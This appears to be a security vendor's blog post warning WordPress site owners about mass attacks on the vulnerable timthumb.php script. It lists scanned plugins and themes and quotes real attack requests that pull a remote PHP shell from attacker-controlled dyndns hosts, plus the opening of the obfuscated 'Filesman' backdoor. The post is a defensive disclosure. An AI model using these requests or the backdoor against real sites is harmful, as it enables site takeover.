The Latest in IT Security

We are seeing large scale attacks against the vulnerable timthumb.php script in the wild. Thousands of sites are getting compromised and if you have it in your WordPress site, you better get it fixed right now!

After a few days analyzing the compromised sites and many log files, here are the plugins we’ve seen getting scanned by the attackers (total of 25):

a-gallery
dukapress
front-slider
geotag
highlighter
igit-posts-slider-widget
igit-related-posts-with-thumb-images-after-posts
islidex
jquery-slider-for-featured-content
kc-related-posts-by-category
lisl-last-image-slider
meenews
meenews-newsletter
mobile-smart
seo-image-galleries
shortcodes-ultimate
smart-related-posts-thumbnails
webphysiology-portfolio
wordpress-gallery-plugin
wp-mobile-detector
wp-slick-slider
shortcodes-ultimate
social-profiles-widget
woo-tumblog

Here are the themes we’ve seen scanned (total of 45):

aqua-blue
bueno
canvas
deep-blue
flashnews
freshnews
magazinum
Magnificent
mymag
sportpress
TheStyle
wp-creativix
backstage
bueno
busybee
canvas
cinch
cityguide
coffeebreak
dailyedition
delegate
delicate
digitalfarm
ElegantEstate
flashnews
freshnews
gazette
headlines
magazinum
Magnificent
mystream
nomadic
object
openair
optimize
overeasy
premiumnews
retreat
royalle
slanted
sophisticatedfolio
sportpress
thejournal
thestation
TheStyle

If you have any of these installed on your site, please verify them for the TimThumb script. If they contain the script ensure it is updated immediately.

Attacks in the wild

We are seeing many attacks in the wild, basically they scan all these plugins and themes, then attempt to compromise the site.

Here is a type of request they will make:

GET /wp-content/plugins/wordpress-gallery-plugin/timthumb.php?src=http://picasa.com12345.dyndns.org/1.php

Did you catch that? They created a fake domain on dyndns, called picasa.com123435.dyndns.org and used that to upload a PHP shell.

Another types of attacks will looks like that:

GET /wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=http://a57fc3picasa.complex.dyndns-pics.com/pics/pics.php
GET /wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=http://adcb293eb4a6efa757baca4c6efd6picasa.complex.dyndns-pics.com/pics/pics.php
GET /wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=http://a9d4b9a85d79f02f2picasa.commandos7.dyndns.info/pics/pics.php

This time using a57fc3picasa.complex.dyndns-pics.com/pics/pics.php to upload the backdoor on to the site.

When you check for these backdoors, they are the standard “Filesman” backdoor:

<?php $auth_pass = "47a85"."6c68".”e623468d84123″.”e87881d1e3″;$color = “#df5″;$default_action = "File".’sMa’.’n’;$default_use_ajax = true;$default_charset = ‘Windows-’.’1251′;…

As you can see, they are very easy to execute (a simple GET) and can really damage your site. Now, it’s time to take action!

If you are not sure if your site is compromised already, you can scan it using Sucuri SiteCheck. If you need help, sign up here and we can fix/secure your site for you.